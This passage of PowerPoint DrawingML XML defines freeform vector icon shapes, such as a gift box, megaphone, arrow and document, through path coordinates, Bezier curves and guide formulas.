                  <a:gd name="T82" fmla="*/ 32 w 74"/>
                  <a:gd name="T83" fmla="*/ 44 h 83"/>
                  <a:gd name="T84" fmla="*/ 32 w 74"/>
                  <a:gd name="T85" fmla="*/ 78 h 83"/>
                  <a:gd name="T86" fmla="*/ 32 w 74"/>
                  <a:gd name="T87" fmla="*/ 41 h 83"/>
                  <a:gd name="T88" fmla="*/ 5 w 74"/>
                  <a:gd name="T89" fmla="*/ 41 h 83"/>
                  <a:gd name="T90" fmla="*/ 5 w 74"/>
                  <a:gd name="T91" fmla="*/ 30 h 83"/>
                  <a:gd name="T92" fmla="*/ 32 w 74"/>
                  <a:gd name="T93" fmla="*/ 30 h 83"/>
                  <a:gd name="T94" fmla="*/ 32 w 74"/>
                  <a:gd name="T95" fmla="*/ 41 h 83"/>
                  <a:gd name="T96" fmla="*/ 63 w 74"/>
                  <a:gd name="T97" fmla="*/ 78 h 83"/>
                  <a:gd name="T98" fmla="*/ 42 w 74"/>
                  <a:gd name="T99" fmla="*/ 78 h 83"/>
                  <a:gd name="T100" fmla="*/ 42 w 74"/>
                  <a:gd name="T101" fmla="*/ 44 h 83"/>
                  <a:gd name="T102" fmla="*/ 63 w 74"/>
                  <a:gd name="T103" fmla="*/ 44 h 83"/>
                  <a:gd name="T104" fmla="*/ 63 w 74"/>
                  <a:gd name="T105" fmla="*/ 78 h 83"/>
                  <a:gd name="T106" fmla="*/ 68 w 74"/>
                  <a:gd name="T107" fmla="*/ 41 h 83"/>
                  <a:gd name="T108" fmla="*/ 42 w 74"/>
                  <a:gd name="T109" fmla="*/ 41 h 83"/>
                  <a:gd name="T110" fmla="*/ 42 w 74"/>
                  <a:gd name="T111" fmla="*/ 30 h 83"/>
                  <a:gd name="T112" fmla="*/ 68 w 74"/>
                  <a:gd name="T113" fmla="*/ 30 h 83"/>
                  <a:gd name="T114" fmla="*/ 68 w 74"/>
                  <a:gd name="T115" fmla="*/ 4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" h="83">
                    <a:moveTo>
                      <a:pt x="58" y="25"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="60" y="24"/>
                      <a:pt x="61" y="23"/>
                      <a:pt x="62" y="22"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="19"/>
                      <a:pt x="67" y="15"/>
                      <a:pt x="68" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="8"/>
                      <a:pt x="67" y="5"/>
                      <a:pt x="65" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="1"/>
                      <a:pt x="61" y="0"/>
                      <a:pt x="58" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="0"/>
                      <a:pt x="49" y="2"/>
                      <a:pt x="46" y="5"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="11"/>
                      <a:pt x="37" y="18"/>
                      <a:pt x="36" y="24"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="34" y="18"/>
                      <a:pt x="32" y="11"/>
                      <a:pt x="27" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="3"/>
                      <a:pt x="21" y="2"/>
                      <a:pt x="18" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="2"/>
                      <a:pt x="13" y="3"/>
                      <a:pt x="11" y="5"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="9"/>
                      <a:pt x="7" y="16"/>
                      <a:pt x="12" y="21"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="22"/>
                      <a:pt x="16" y="24"/>
                      <a:pt x="18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83"/>
                      <a:pt x="5" y="83"/>
                      <a:pt x="5" y="83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74" y="46"/>
                      <a:pt x="74" y="46"/>
                      <a:pt x="74" y="46"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="25"/>
                      <a:pt x="74" y="25"/>
                      <a:pt x="74" y="25"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="58" y="25"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="50" y="9"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="7"/>
                      <a:pt x="55" y="6"/>
                      <a:pt x="58" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="6"/>
                      <a:pt x="60" y="6"/>
                      <a:pt x="61" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="9"/>
                      <a:pt x="62" y="14"/>
                      <a:pt x="58" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="55" y="21"/>
                      <a:pt x="50" y="23"/>
                      <a:pt x="46" y="25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3" y="20"/>
                      <a:pt x="46" y="14"/>
                      <a:pt x="50" y="9"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="14" y="12"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="11"/>
                      <a:pt x="14" y="10"/>
                      <a:pt x="15" y="9"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16" y="8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8"/>
                      <a:pt x="21" y="9"/>
                      <a:pt x="23" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="13"/>
                      <a:pt x="28" y="17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2"/>
                      <a:pt x="19" y="19"/>
                      <a:pt x="16" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="15"/>
                      <a:pt x="14" y="14"/>
                      <a:pt x="14" y="12"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="32" y="78"/>
                    </a:move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32" y="78"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="32" y="41"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="41"/>
                      <a:pt x="5" y="41"/>
                      <a:pt x="5" y="41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32" y="30"/>
                      <a:pt x="32" y="30"/>
                      <a:pt x="32" y="30"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="32" y="41"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="63" y="78"/>
                    </a:move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63" y="44"/>
                      <a:pt x="63" y="44"/>
                      <a:pt x="63" y="44"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="63" y="78"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="68" y="41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68" y="30"/>
                      <a:pt x="68" y="30"/>
                      <a:pt x="68" y="30"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="68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7" name="Freeform 170">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E494D96-A900-42EC-AB0E-2893F8465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4116" y="2039163"/>
                <a:ext cx="303387" cy="264239"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 95 w 95"/>
                  <a:gd name="T1" fmla="*/ 34 h 83"/>
                  <a:gd name="T2" fmla="*/ 83 w 95"/>
                  <a:gd name="T3" fmla="*/ 0 h 83"/>
                  <a:gd name="T4" fmla="*/ 83 w 95"/>
                  <a:gd name="T5" fmla="*/ 0 h 83"/>
                  <a:gd name="T6" fmla="*/ 75 w 95"/>
                  <a:gd name="T7" fmla="*/ 0 h 83"/>
                  <a:gd name="T8" fmla="*/ 31 w 95"/>
                  <a:gd name="T9" fmla="*/ 19 h 83"/>
                  <a:gd name="T10" fmla="*/ 30 w 95"/>
                  <a:gd name="T11" fmla="*/ 34 h 83"/>
                  <a:gd name="T12" fmla="*/ 31 w 95"/>
                  <a:gd name="T13" fmla="*/ 49 h 83"/>
                  <a:gd name="T14" fmla="*/ 75 w 95"/>
                  <a:gd name="T15" fmla="*/ 68 h 83"/>
                  <a:gd name="T16" fmla="*/ 83 w 95"/>
                  <a:gd name="T17" fmla="*/ 68 h 83"/>
                  <a:gd name="T18" fmla="*/ 83 w 95"/>
                  <a:gd name="T19" fmla="*/ 68 h 83"/>
                  <a:gd name="T20" fmla="*/ 95 w 95"/>
                  <a:gd name="T21" fmla="*/ 34 h 83"/>
                  <a:gd name="T22" fmla="*/ 80 w 95"/>
                  <a:gd name="T23" fmla="*/ 63 h 83"/>
                  <a:gd name="T24" fmla="*/ 78 w 95"/>
                  <a:gd name="T25" fmla="*/ 61 h 83"/>
                  <a:gd name="T26" fmla="*/ 75 w 95"/>
                  <a:gd name="T27" fmla="*/ 55 h 83"/>
                  <a:gd name="T28" fmla="*/ 71 w 95"/>
                  <a:gd name="T29" fmla="*/ 34 h 83"/>
                  <a:gd name="T30" fmla="*/ 75 w 95"/>
                  <a:gd name="T31" fmla="*/ 13 h 83"/>
                  <a:gd name="T32" fmla="*/ 78 w 95"/>
                  <a:gd name="T33" fmla="*/ 7 h 83"/>
                  <a:gd name="T34" fmla="*/ 80 w 95"/>
                  <a:gd name="T35" fmla="*/ 5 h 83"/>
                  <a:gd name="T36" fmla="*/ 83 w 95"/>
                  <a:gd name="T37" fmla="*/ 7 h 83"/>
                  <a:gd name="T38" fmla="*/ 86 w 95"/>
                  <a:gd name="T39" fmla="*/ 13 h 83"/>
                  <a:gd name="T40" fmla="*/ 89 w 95"/>
                  <a:gd name="T41" fmla="*/ 34 h 83"/>
                  <a:gd name="T42" fmla="*/ 86 w 95"/>
                  <a:gd name="T43" fmla="*/ 55 h 83"/>
                  <a:gd name="T44" fmla="*/ 83 w 95"/>
                  <a:gd name="T45" fmla="*/ 61 h 83"/>
                  <a:gd name="T46" fmla="*/ 80 w 95"/>
                  <a:gd name="T47" fmla="*/ 63 h 83"/>
                  <a:gd name="T48" fmla="*/ 24 w 95"/>
                  <a:gd name="T49" fmla="*/ 34 h 83"/>
                  <a:gd name="T50" fmla="*/ 25 w 95"/>
                  <a:gd name="T51" fmla="*/ 20 h 83"/>
                  <a:gd name="T52" fmla="*/ 12 w 95"/>
                  <a:gd name="T53" fmla="*/ 21 h 83"/>
                  <a:gd name="T54" fmla="*/ 5 w 95"/>
                  <a:gd name="T55" fmla="*/ 21 h 83"/>
                  <a:gd name="T56" fmla="*/ 0 w 95"/>
                  <a:gd name="T57" fmla="*/ 30 h 83"/>
                  <a:gd name="T58" fmla="*/ 0 w 95"/>
                  <a:gd name="T59" fmla="*/ 38 h 83"/>
                  <a:gd name="T60" fmla="*/ 5 w 95"/>
                  <a:gd name="T61" fmla="*/ 47 h 83"/>
                  <a:gd name="T62" fmla="*/ 12 w 95"/>
                  <a:gd name="T63" fmla="*/ 47 h 83"/>
                  <a:gd name="T64" fmla="*/ 25 w 95"/>
                  <a:gd name="T65" fmla="*/ 48 h 83"/>
                  <a:gd name="T66" fmla="*/ 24 w 95"/>
                  <a:gd name="T67" fmla="*/ 34 h 83"/>
                  <a:gd name="T68" fmla="*/ 34 w 95"/>
                  <a:gd name="T69" fmla="*/ 54 h 83"/>
                  <a:gd name="T70" fmla="*/ 23 w 95"/>
                  <a:gd name="T71" fmla="*/ 51 h 83"/>
                  <a:gd name="T72" fmla="*/ 30 w 95"/>
                  <a:gd name="T73" fmla="*/ 81 h 83"/>
                  <a:gd name="T74" fmla="*/ 34 w 95"/>
                  <a:gd name="T75" fmla="*/ 83 h 83"/>
                  <a:gd name="T76" fmla="*/ 44 w 95"/>
                  <a:gd name="T77" fmla="*/ 78 h 83"/>
                  <a:gd name="T78" fmla="*/ 46 w 95"/>
                  <a:gd name="T79" fmla="*/ 75 h 83"/>
                  <a:gd name="T80" fmla="*/ 34 w 95"/>
                  <a:gd name="T81" fmla="*/ 54 h 83"/>
                  <a:gd name="T82" fmla="*/ 80 w 95"/>
                  <a:gd name="T83" fmla="*/ 45 h 83"/>
                  <a:gd name="T84" fmla="*/ 79 w 95"/>
                  <a:gd name="T85" fmla="*/ 45 h 83"/>
                  <a:gd name="T86" fmla="*/ 78 w 95"/>
                  <a:gd name="T87" fmla="*/ 42 h 83"/>
                  <a:gd name="T88" fmla="*/ 77 w 95"/>
                  <a:gd name="T89" fmla="*/ 34 h 83"/>
                  <a:gd name="T90" fmla="*/ 78 w 95"/>
                  <a:gd name="T91" fmla="*/ 26 h 83"/>
                  <a:gd name="T92" fmla="*/ 79 w 95"/>
                  <a:gd name="T93" fmla="*/ 24 h 83"/>
                  <a:gd name="T94" fmla="*/ 80 w 95"/>
                  <a:gd name="T95" fmla="*/ 23 h 83"/>
                  <a:gd name="T96" fmla="*/ 81 w 95"/>
                  <a:gd name="T97" fmla="*/ 24 h 83"/>
                  <a:gd name="T98" fmla="*/ 82 w 95"/>
                  <a:gd name="T99" fmla="*/ 26 h 83"/>
                  <a:gd name="T100" fmla="*/ 84 w 95"/>
                  <a:gd name="T101" fmla="*/ 34 h 83"/>
                  <a:gd name="T102" fmla="*/ 82 w 95"/>
                  <a:gd name="T103" fmla="*/ 42 h 83"/>
                  <a:gd name="T104" fmla="*/ 81 w 95"/>
                  <a:gd name="T105" fmla="*/ 45 h 83"/>
                  <a:gd name="T106" fmla="*/ 80 w 95"/>
                  <a:gd name="T107" fmla="*/ 4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83">
                    <a:moveTo>
                      <a:pt x="95" y="34"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="95" y="15"/>
                      <a:pt x="90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57" y="14"/>
                      <a:pt x="31" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="31" y="23"/>
                      <a:pt x="30" y="28"/>
                      <a:pt x="30" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="30" y="40"/>
                      <a:pt x="31" y="45"/>
                      <a:pt x="31" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="57" y="54"/>
                      <a:pt x="75" y="68"/>
                      <a:pt x="75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83" y="68"/>
                      <a:pt x="83" y="68"/>
                      <a:pt x="83" y="68"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="90" y="68"/>
                      <a:pt x="95" y="53"/>
                      <a:pt x="95" y="34"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="80" y="63"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="79" y="63"/>
                      <a:pt x="78" y="62"/>
                      <a:pt x="78" y="61"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="77" y="60"/>
                      <a:pt x="76" y="58"/>
                      <a:pt x="75" y="55"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="50"/>
                      <a:pt x="71" y="42"/>
                      <a:pt x="71" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="26"/>
                      <a:pt x="73" y="18"/>
                      <a:pt x="75" y="13"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="10"/>
                      <a:pt x="77" y="8"/>
                      <a:pt x="78" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="6"/>
                      <a:pt x="79" y="5"/>
                      <a:pt x="80" y="5"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="5"/>
                      <a:pt x="82" y="6"/>
                      <a:pt x="83" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="84" y="8"/>
                      <a:pt x="85" y="10"/>
                      <a:pt x="86" y="13"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="88" y="18"/>
                      <a:pt x="89" y="26"/>
                      <a:pt x="89" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="89" y="42"/>
                      <a:pt x="88" y="50"/>
                      <a:pt x="86" y="55"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="58"/>
                      <a:pt x="84" y="60"/>
                      <a:pt x="83" y="61"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="62"/>
                      <a:pt x="81" y="63"/>
                      <a:pt x="80" y="63"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="24" y="34"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="29"/>
                      <a:pt x="24" y="25"/>
                      <a:pt x="25" y="20"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="20" y="21"/>
                      <a:pt x="16" y="21"/>
                      <a:pt x="12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5" y="47"/>
                      <a:pt x="12" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16" y="47"/>
                      <a:pt x="20" y="47"/>
                      <a:pt x="25" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="43"/>
                      <a:pt x="24" y="39"/>
                      <a:pt x="24" y="34"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="34" y="54"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="51"/>
                      <a:pt x="23" y="51"/>
                      <a:pt x="23" y="5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1" y="83"/>
                      <a:pt x="32" y="83"/>
                      <a:pt x="34" y="8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6" y="78"/>
                      <a:pt x="47" y="76"/>
                      <a:pt x="46" y="75"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="34" y="54"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="80" y="45"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="80" y="45"/>
                      <a:pt x="80" y="45"/>
                      <a:pt x="79" y="45"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="79" y="44"/>
                      <a:pt x="79" y="43"/>
                      <a:pt x="78" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="77" y="40"/>
                      <a:pt x="77" y="37"/>
                      <a:pt x="77" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="77" y="31"/>
                      <a:pt x="77" y="28"/>
                      <a:pt x="78" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="79" y="25"/>
                      <a:pt x="79" y="24"/>
                      <a:pt x="79" y="24"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="80" y="23"/>
                      <a:pt x="80" y="23"/>
                      <a:pt x="80" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="23"/>
                      <a:pt x="81" y="23"/>
                      <a:pt x="81" y="24"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="24"/>
                      <a:pt x="82" y="25"/>
                      <a:pt x="82" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="28"/>
                      <a:pt x="84" y="31"/>
                      <a:pt x="84" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="84" y="37"/>
                      <a:pt x="83" y="40"/>
                      <a:pt x="82" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="43"/>
                      <a:pt x="82" y="44"/>
                      <a:pt x="81" y="45"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="45"/>
                      <a:pt x="81" y="45"/>
                      <a:pt x="8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8" name="Freeform 173">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C91CAB77-8989-4986-9463-6CCF84109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1370" y="2444330"/>
                <a:ext cx="236837" cy="236836"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 60 w 121"/>
                  <a:gd name="T1" fmla="*/ 121 h 121"/>
                  <a:gd name="T2" fmla="*/ 121 w 121"/>
                  <a:gd name="T3" fmla="*/ 61 h 121"/>
                  <a:gd name="T4" fmla="*/ 83 w 121"/>
                  <a:gd name="T5" fmla="*/ 61 h 121"/>
                  <a:gd name="T6" fmla="*/ 83 w 121"/>
                  <a:gd name="T7" fmla="*/ 0 h 121"/>
                  <a:gd name="T8" fmla="*/ 37 w 121"/>
                  <a:gd name="T9" fmla="*/ 0 h 121"/>
                  <a:gd name="T10" fmla="*/ 37 w 121"/>
                  <a:gd name="T11" fmla="*/ 61 h 121"/>
                  <a:gd name="T12" fmla="*/ 0 w 121"/>
                  <a:gd name="T13" fmla="*/ 61 h 121"/>
                  <a:gd name="T14" fmla="*/ 60 w 121"/>
                  <a:gd name="T15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21">
                    <a:moveTo>
                      <a:pt x="60" y="121"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="121" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="1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69" name="Freeform 176">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8BAEDC67-1760-43CC-90F4-FB499C783E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22892" y="3976918"/>
                <a:ext cx="205520" cy="152672"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 56 w 64"/>
                  <a:gd name="T1" fmla="*/ 8 h 48"/>
                  <a:gd name="T2" fmla="*/ 56 w 64"/>
                  <a:gd name="T3" fmla="*/ 0 h 48"/>
                  <a:gd name="T4" fmla="*/ 0 w 64"/>
                  <a:gd name="T5" fmla="*/ 0 h 48"/>
                  <a:gd name="T6" fmla="*/ 0 w 64"/>
                  <a:gd name="T7" fmla="*/ 44 h 48"/>
                  <a:gd name="T8" fmla="*/ 4 w 64"/>
                  <a:gd name="T9" fmla="*/ 48 h 48"/>
                  <a:gd name="T10" fmla="*/ 58 w 64"/>
                  <a:gd name="T11" fmla="*/ 48 h 48"/>
                  <a:gd name="T12" fmla="*/ 64 w 64"/>
                  <a:gd name="T13" fmla="*/ 42 h 48"/>
                  <a:gd name="T14" fmla="*/ 64 w 64"/>
                  <a:gd name="T15" fmla="*/ 8 h 48"/>
                  <a:gd name="T16" fmla="*/ 56 w 64"/>
                  <a:gd name="T17" fmla="*/ 8 h 48"/>
                  <a:gd name="T18" fmla="*/ 52 w 64"/>
                  <a:gd name="T19" fmla="*/ 44 h 48"/>
                  <a:gd name="T20" fmla="*/ 4 w 64"/>
                  <a:gd name="T21" fmla="*/ 44 h 48"/>
                  <a:gd name="T22" fmla="*/ 4 w 64"/>
                  <a:gd name="T23" fmla="*/ 4 h 48"/>
                  <a:gd name="T24" fmla="*/ 52 w 64"/>
                  <a:gd name="T25" fmla="*/ 4 h 48"/>
                  <a:gd name="T26" fmla="*/ 52 w 64"/>
                  <a:gd name="T27" fmla="*/ 44 h 48"/>
                  <a:gd name="T28" fmla="*/ 8 w 64"/>
                  <a:gd name="T29" fmla="*/ 12 h 48"/>
                  <a:gd name="T30" fmla="*/ 48 w 64"/>
                  <a:gd name="T31" fmla="*/ 12 h 48"/>
                  <a:gd name="T32" fmla="*/ 48 w 64"/>
                  <a:gd name="T33" fmla="*/ 16 h 48"/>
                  <a:gd name="T34" fmla="*/ 8 w 64"/>
                  <a:gd name="T35" fmla="*/ 16 h 48"/>
                  <a:gd name="T36" fmla="*/ 8 w 64"/>
                  <a:gd name="T37" fmla="*/ 12 h 48"/>
                  <a:gd name="T38" fmla="*/ 32 w 64"/>
                  <a:gd name="T39" fmla="*/ 20 h 48"/>
                  <a:gd name="T40" fmla="*/ 48 w 64"/>
                  <a:gd name="T41" fmla="*/ 20 h 48"/>
                  <a:gd name="T42" fmla="*/ 48 w 64"/>
                  <a:gd name="T43" fmla="*/ 24 h 48"/>
                  <a:gd name="T44" fmla="*/ 32 w 64"/>
                  <a:gd name="T45" fmla="*/ 24 h 48"/>
                  <a:gd name="T46" fmla="*/ 32 w 64"/>
                  <a:gd name="T47" fmla="*/ 20 h 48"/>
                  <a:gd name="T48" fmla="*/ 32 w 64"/>
                  <a:gd name="T49" fmla="*/ 28 h 48"/>
                  <a:gd name="T50" fmla="*/ 48 w 64"/>
                  <a:gd name="T51" fmla="*/ 28 h 48"/>
                  <a:gd name="T52" fmla="*/ 48 w 64"/>
                  <a:gd name="T53" fmla="*/ 32 h 48"/>
                  <a:gd name="T54" fmla="*/ 32 w 64"/>
                  <a:gd name="T55" fmla="*/ 32 h 48"/>
                  <a:gd name="T56" fmla="*/ 32 w 64"/>
                  <a:gd name="T57" fmla="*/ 28 h 48"/>
                  <a:gd name="T58" fmla="*/ 32 w 64"/>
                  <a:gd name="T59" fmla="*/ 36 h 48"/>
                  <a:gd name="T60" fmla="*/ 44 w 64"/>
                  <a:gd name="T61" fmla="*/ 36 h 48"/>
                  <a:gd name="T62" fmla="*/ 44 w 64"/>
                  <a:gd name="T63" fmla="*/ 40 h 48"/>
                  <a:gd name="T64" fmla="*/ 32 w 64"/>
                  <a:gd name="T65" fmla="*/ 40 h 48"/>
                  <a:gd name="T66" fmla="*/ 32 w 64"/>
                  <a:gd name="T67" fmla="*/ 36 h 48"/>
                  <a:gd name="T68" fmla="*/ 8 w 64"/>
                  <a:gd name="T69" fmla="*/ 20 h 48"/>
                  <a:gd name="T70" fmla="*/ 28 w 64"/>
                  <a:gd name="T71" fmla="*/ 20 h 48"/>
                  <a:gd name="T72" fmla="*/ 28 w 64"/>
                  <a:gd name="T73" fmla="*/ 40 h 48"/>
                  <a:gd name="T74" fmla="*/ 8 w 64"/>
                  <a:gd name="T75" fmla="*/ 40 h 48"/>
                  <a:gd name="T76" fmla="*/ 8 w 64"/>
                  <a:gd name="T77" fmla="*/ 2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4" h="48">
                    <a:moveTo>
                      <a:pt x="56" y="8"/>
                    </a:move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6"/>
                      <a:pt x="2" y="48"/>
                      <a:pt x="4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61" y="48"/>
                      <a:pt x="64" y="45"/>
                      <a:pt x="64" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="8"/>
                      <a:pt x="64" y="8"/>
                      <a:pt x="64" y="8"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="56" y="8"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="52" y="44"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="44"/>
                      <a:pt x="4" y="44"/>
                      <a:pt x="4" y="4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2" y="4"/>
                      <a:pt x="52" y="4"/>
                      <a:pt x="52" y="4"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="52" y="44"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="8" y="12"/>
                    </a:move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8" y="16"/>
                      <a:pt x="8" y="16"/>
                      <a:pt x="8" y="16"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="8" y="12"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="32" y="20"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="48" y="20"/>
                      <a:pt x="48" y="20"/>
                      <a:pt x="48" y="20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32" y="20"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="32" y="28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2" y="32"/>
                      <a:pt x="32" y="32"/>
                      <a:pt x="32" y="32"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="32" y="28"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="32" y="36"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="36"/>
                      <a:pt x="44" y="36"/>
                      <a:pt x="44" y="36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32" y="40"/>
                      <a:pt x="32" y="40"/>
                      <a:pt x="32" y="40"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="32" y="36"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="8" y="20"/>
                    </a:move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8" y="40"/>
                      <a:pt x="8" y="40"/>
                      <a:pt x="8" y="40"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="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0" name="Freeform 180">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29D5ABBD-F6FC-43CA-8C36-8AF14F79EB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4756" y="1359970"/>
                <a:ext cx="246623" cy="246623"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 64 w 77"/>
                  <a:gd name="T1" fmla="*/ 0 h 77"/>
                  <a:gd name="T2" fmla="*/ 13 w 77"/>
                  <a:gd name="T3" fmla="*/ 0 h 77"/>
                  <a:gd name="T4" fmla="*/ 0 w 77"/>
